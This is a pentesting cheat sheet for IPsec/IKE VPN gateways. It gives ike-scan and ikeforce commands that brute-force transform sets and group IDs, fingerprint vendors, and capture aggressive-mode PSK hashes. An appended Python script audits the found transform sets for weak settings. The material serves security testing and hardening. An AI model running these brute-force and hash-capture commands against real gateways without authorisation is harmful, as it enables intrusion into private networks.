| description |
|---|
| IP Security |
- https://xakep.ru/2015/05/13/ipsec-security-flaws/
- https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cracking-ike-missionimprobable-part-1/
- https://github.com/SpiderLabs/ikeforce
Using ikeforce.py:
$ sudo python ikeforce.py 10.10.13.37 -a
Using ike-scan to brute force transform sets. First generate the list of all transform-set combinations (ENC,HASH,AUTH,GROUP):
$ for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "$ENC,$HASH,$AUTH,$GROUP" >> trans-dict.txt; done; done; done; done
Brute force supported transform-sets:
$ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M --trans=$t 10.10.13.37) |grep -B14 "1 returned handshake" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt
Or (for aggressive mode)
$ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M -A -P'handshake.txt' -n FAKEID --trans=$t 10.10.13.37) |grep -B7 "SA=" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt
Or
$ sudo python ikeforce.py -s1 -a 10.10.13.37 # -s1 for max speed
Identify the vendor/implementation via backoff fingerprinting:
$ sudo ike-scan -M --showbackoff [--trans=<TRANSFORM-SET>] 10.10.13.37
Test whether aggressive mode is enabled:
$ sudo ike-scan -M -A -P -n FAKEID [--trans=<TRANSFORM-SET>] 10.10.13.37
If no hash value is returned, brute forcing the group ID may still be possible:
$ while read id; do (echo "[+] Valid ID: $id" && sudo ike-scan -M -A -n $id --trans=<TRANSFORM-SET> 10.10.13.37) | grep -B14 "1 returned handshake" | grep "Valid ID" |tee -a group-id.txt; done < dict.txt
Or
$ sudo python ikeforce.py 10.10.13.37 -e -w wordlists/groupnames.dic -t <TRANSFORM-SET-IN-SEPARATE-ARGS>
Dictionaries:
/usr/share/seclists/Miscellaneous/ike-groupid.txt
~/tools/ikeforce/wordlists/groupnames.dic
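Added example, not part of this cheat sheet or of the ike-scan/ikeforce projects: a small Python audit that decodes the transform sets saved in trans.txt (the `[+] Valid trans-set: ...` lines produced above) using the IANA IKEv1 attribute codes and flags the proposals a gateway owner should disable, including PSK authentication, which is what the aggressive-mode check further up relies on. The `SAMPLE` lines are constructed, not real scan output.

```python
import re

# IANA IKEv1 attribute values (RFC 2409 / IPsec registry) matching the codes in trans-dict.txt
ENC = {"1": "DES", "2": "IDEA", "3": "Blowfish", "4": "RC5", "5": "3DES",
       "6": "CAST", "7": "AES", "8": "Camellia"}
HASH = {"1": "MD5", "2": "SHA1", "3": "Tiger", "4": "SHA2-256", "5": "SHA2-384", "6": "SHA2-512"}
AUTH = {"1": "PSK", "2": "DSS-sig", "3": "RSA-sig", "4": "RSA-enc", "5": "RSA-enc-rev",
        "65001": "XAUTH-init-PSK", "65002": "XAUTH-resp-PSK"}
MODP_BITS = {"1": 768, "2": 1024, "5": 1536, "14": 2048, "15": 3072,
             "16": 4096, "17": 6144, "18": 8192}
LEGACY_CIPHERS = {"DES", "IDEA", "Blowfish", "RC5", "CAST", "3DES"}

LINE = re.compile(r"Valid trans-set:\s*(\S+)")

def parse_trans_set(spec):
    """'7/256,4,3,14' -> decoded enc/keylen/hash/auth/group fields."""
    enc, hsh, auth, grp = spec.split(",")
    enc_code, _, keylen = enc.partition("/")       # "7/256" carries the AES key length
    return {"enc": ENC.get(enc_code, f"enc#{enc_code}"), "keylen": int(keylen) if keylen else None,
            "hash": HASH.get(hsh, f"hash#{hsh}"), "auth": AUTH.get(auth, f"auth#{auth}"),
            "group": grp, "raw": spec}

def weaknesses(ts):
    """Hardening findings for one accepted phase-1 proposal (empty list == acceptable)."""
    found = []
    if ts["enc"] in LEGACY_CIPHERS:
        found.append(f"legacy cipher {ts['enc']}")
    if ts["hash"] in ("MD5", "SHA1"):
        found.append(f"weak hash {ts['hash']}")
    bits = MODP_BITS.get(ts["group"])
    if bits is not None and bits < 2048:
        found.append(f"DH group {ts['group']} ({bits}-bit MODP)")
    if ts["auth"].endswith("PSK"):               # covers PSK and XAUTH-with-PSK variants
        found.append("PSK auth: with aggressive mode the PSK hash is exposed to offline cracking")
    return found

def audit(lines):
    """Map each accepted transform set in trans.txt-style lines to its findings."""
    report = {}
    for line in lines:
        m = LINE.search(line)
        if m:
            ts = parse_trans_set(m.group(1))
            report[ts["raw"]] = weaknesses(ts)
    return report

# Constructed sample of trans.txt content (not real scan data)
SAMPLE = ["[+] Valid trans-set: 5,2,1,2",
          "[+] Valid trans-set: 7/256,4,3,14",
          "[+] Valid trans-set: 1,1,65001,1"]

if __name__ == "__main__":
    for raw, findings in audit(SAMPLE).items():
        print(raw, "->", "; ".join(findings) or "OK")
```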